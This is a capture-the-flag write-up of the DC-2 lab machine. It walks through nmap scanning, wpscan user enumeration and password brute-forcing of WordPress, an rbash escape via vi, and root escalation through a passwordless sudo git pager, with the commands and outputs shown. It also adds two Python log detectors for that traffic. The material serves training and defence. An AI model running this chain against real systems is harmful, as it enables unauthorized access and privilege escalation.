DC2 target machine writeup
2022-02-14 13:42:16


Host discovery (the other hosts on the internal network are omitted)

Use arp-scan to discover hosts, specifying the network interface en0

sudo arp-scan --interface=en0 -l

172.16.27.xxx	00:0c:29:55:55:aa	VMware, Inc.

Use nmap to gather information about the host

sudo nmap -p- 172.16.27.xxx -sV -O -vv

PORT     STATE SERVICE REASON         VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
7744/tcp open ssh syn-ack ttl 64 OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)

OS details: Linux 3.2 - 4.9

Accessing port 80

The site cannot be reached because it automatically redirects to http://dc-2; edit the hosts file to bind the IP address to that domain name.

127.0.0.1	localhost
127.0.1.1 kali
172.16.27.xxx dc-2 # add this line
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

The site is found to run WordPress CMS, version 4.7.10

flag1

Browsing the web page reveals a flag directory, which contains flag1

Flag 1:
Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.

Following the flag1 hint, use the cewl tool to look for passwords hidden in the page content

cewl -w dc2_pwd.txt http://dc-2

dc2_pwd.txt (the generated wordlist of 238 words is omitted here)

With a password list in hand, use wpscan to find usernames

wpscan --url http://dc-2 --enumerate u

[i] User(s) Identified:

[+] admin
| Found By: Rss Generator (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] jerry
| Found By: Wp Json Api (Aggressive Detection)
| - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Confirmed By:
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)

[+] tom
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Confirmed By: Login Error Messages (Aggressive Detection)

Try brute-forcing the passwords (there is more than one way: wpscan/burpsuite/hydra...)

wpscan --url http://dc-2 --usernames dc2_uname.txt --passwords dc2_pwd.txt

[!] Valid Combinations Found:
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
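Everything wpscan did above leaves a clear trace in the web server's access log: a request to the wp-json users endpoint, a run of ?author=N probes, and a burst of POSTs to wp-login.php that mostly fail (HTTP 200 re-renders the form) before one succeeds (HTTP 302). The detector below is an added example, not part of the original writeup; the log lines are constructed to imitate that traffic, and the login threshold is an assumption.

```python
import re
from collections import defaultdict

# Apache combined log format; only the fields the detector needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample (not captured from DC-2): user enumeration via the wp-json
# users endpoint and ?author=N, then 12 failed logins (200) and one success (302).
_TS = "[14/Feb/2022:13:42:16 +0800]"
SAMPLE_LOG = [
    f'10.0.0.5 - - {_TS} "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 812 "-" "WPScan"',
] + [f'10.0.0.5 - - {_TS} "GET /?author={n} HTTP/1.1" 301 0 "-" "WPScan"' for n in range(1, 4)
] + [f'10.0.0.5 - - {_TS} "POST /wp-login.php HTTP/1.1" 200 2410 "-" "WPScan"'] * 12 + [
    f'10.0.0.5 - - {_TS} "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan"',
    f'10.0.0.9 - - {_TS} "GET /index.php/about/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    f'10.0.0.9 - - {_TS} "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

ENUM_PATTERNS = (
    ("wp-json user listing", re.compile(r"/wp-json/wp/v2/users")),
    ("author id probing", re.compile(r"[?&]author=\d+")),
)

def analyse(lines, login_threshold=10):
    """Return {ip: [finding, ...]} for IPs that enumerate users or hammer wp-login.php."""
    enum_hits = defaultdict(set)    # ip -> enumeration techniques seen
    login_fail = defaultdict(int)   # ip -> POSTs to wp-login.php answered with anything but 302
    login_ok = defaultdict(int)     # ip -> POSTs to wp-login.php answered with 302 (success)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, path, status = m["ip"], m["method"], m["path"], m["status"]
        for name, pat in ENUM_PATTERNS:
            if pat.search(path):
                enum_hits[ip].add(name)
        if method == "POST" and path.startswith("/wp-login.php"):
            if status == "302":
                login_ok[ip] += 1
            else:
                login_fail[ip] += 1
    findings = defaultdict(list)
    for ip, names in enum_hits.items():
        findings[ip].append("user enumeration: " + ", ".join(sorted(names)))
    for ip, fails in login_fail.items():
        if fails >= login_threshold:
            tail = " followed by a successful login" if login_ok[ip] else ""
            findings[ip].append(f"password guessing: {fails} failed logins{tail}")
    return dict(findings)

if __name__ == "__main__":
    for ip, notes in analyse(SAMPLE_LOG).items():
        print(ip, *notes, sep="\n  ")
```

A single successful login from an IP that was just guessing is the line worth paging on; the ordinary user at 10.0.0.9 produces no finding.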

Finding flag2

The WordPress admin login URL is known: http://ip/wp-admin/

Logging in as tom does not reveal flag2.
Logging in to the admin panel as jerry reveals flag2.

http://dc-2/wp-admin/post.php?post=21&action=edit

Flag 2:
If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.

The hint says to try another way; guess that this means logging in over SSH

Try logging in over SSH with the tom and jerry accounts

Logging in directly as jerry fails

Logging in as tom succeeds:
ssh tom@dc-2 -p7744

ls reveals flag3

tom@DC-2:~$ ls
flag3.txt usr

Using cat produces an error

tom@DC-2:~$ cat flag3.txt
-rbash: cat: command not found

After much searching, a way to get out of rbash:

vi shell
:set shell=/bin/bash
:shell

The rbash restriction is bypassed, but the problem is still not solved

tom@DC-2:~$ cat flag3.txt 
bash: cat: command not found

Add the missing directories to the PATH environment variable

tom@DC-2:~$ export PATH=$PATH:/bin/
tom@DC-2:~$ export PATH=$PATH:/usr/bin

flag3

tom@DC-2:~$ cat flag3.txt

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

flag4

Following the flag3 hint, try switching to the jerry user

su jerry with password adipiscing succeeds, and flag4 is found

jerry@DC-2:/home/tom$ cd ~
jerry@DC-2:~$ ls
flag4.txt
jerry@DC-2:~$

jerry@DC-2:~$ cat flag4.txt

Good to see that you've made it this far - but you're not home yet. 
You still need to get the final flag (the only flag that really counts!!!).
No hints here - you're on your own now. :-)
Go on - git outta here!!!!

final_flag

Following the flag4 hint, the privilege escalation route is probably related to git

jerry@DC-2:~$ sudo -l
Matching Defaults entries for jerry on DC-2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jerry may run the following commands on DC-2:
(root) NOPASSWD: /usr/bin/git

Attempting privilege escalation

jerry@DC-2:~$ sudo git help config
at the end of the pager output, enter: `!/bin/bash`
root@DC-2:/home/jerry#
root@DC-2:/home/jerry# whoami
root
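Both steps of this escalation are logged: the su from tom to jerry and the passwordless sudo of /usr/bin/git both land in /var/log/auth.log, and the fix on the host side is simply to drop the NOPASSWD git entry from sudoers. The correlation below is an added example, not part of the original writeup; the log excerpt is constructed (hostnames and PIDs made up) in the formats Debian's su and sudo write, and the set of pager-spawning binaries is seeded only with the one this page demonstrates.

```python
import re
from collections import defaultdict

# Constructed /var/log/auth.log excerpt (not captured from DC-2).
SAMPLE_AUTH_LOG = """\
Feb 14 13:42:16 DC-2 sshd[1201]: Accepted password for tom from 10.0.0.5 port 51022 ssh2
Feb 14 13:45:02 DC-2 su[1290]: Successful su for jerry by tom
Feb 14 13:45:02 DC-2 su[1290]: + /dev/pts/0 tom:jerry
Feb 14 13:47:30 DC-2 sudo:    jerry : TTY=pts/0 ; PWD=/home/jerry ; USER=root ; COMMAND=/usr/bin/git help config
Feb 14 13:47:30 DC-2 sudo: pam_unix(sudo:session): session opened for user root by jerry(uid=0)
Feb 14 14:10:11 DC-2 sudo:    alice : TTY=pts/1 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/apt-get update
"""

SU_RE = re.compile(r"su\[\d+\]: Successful su for (?P<to>\S+) by (?P<by>\S+)")
SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<as>\S+) ; COMMAND=(?P<cmd>.*)$")

# Binaries that hand the user an interactive pager or editor when run as root;
# the page shows git doing exactly this. Extend the set from your own sudoers audit.
PAGER_SPAWNERS = {"/usr/bin/git"}

def correlate(lines):
    """Alert on a root-level sudo of a pager-spawning binary and record whether the
    sudo-ing account had itself been reached via su from another account."""
    reached_via_su = defaultdict(set)   # target user -> accounts that su'd into it
    alerts = []
    for line in lines:
        m = SU_RE.search(line)
        if m:
            reached_via_su[m["to"]].add(m["by"])
            continue
        m = SUDO_RE.search(line)
        if not m or m["as"] != "root":
            continue
        binary = m["cmd"].split()[0]
        if binary in PAGER_SPAWNERS:
            via = ",".join(sorted(reached_via_su[m["user"]])) or None
            alerts.append({"user": m["user"], "cmd": m["cmd"], "via_su_from": via})
    return alerts

if __name__ == "__main__":
    for alert in correlate(SAMPLE_AUTH_LOG.splitlines()):
        print(alert)
```

The apt-get line from alice shows the filter is about what the binary can do once it runs as root, not about sudo use in general.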

With root privileges obtained, look for the final flag

root@DC-2:/home/jerry# cd ~
root@DC-2:~# ls
final-flag.txt
root@DC-2:~# cat final-flag.txt
__ __ _ _ _ _
/ / /\ \ \___| | | __| | ___ _ __ ___ / \
\ \/ \/ / _ \ | | / _` |/ _ \| '_ \ / _ \/ /
\ /\ / __/ | | | (_| | (_) | | | | __/\_/
\/ \/ \___|_|_| \__,_|\___/|_| |_|\___\/


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.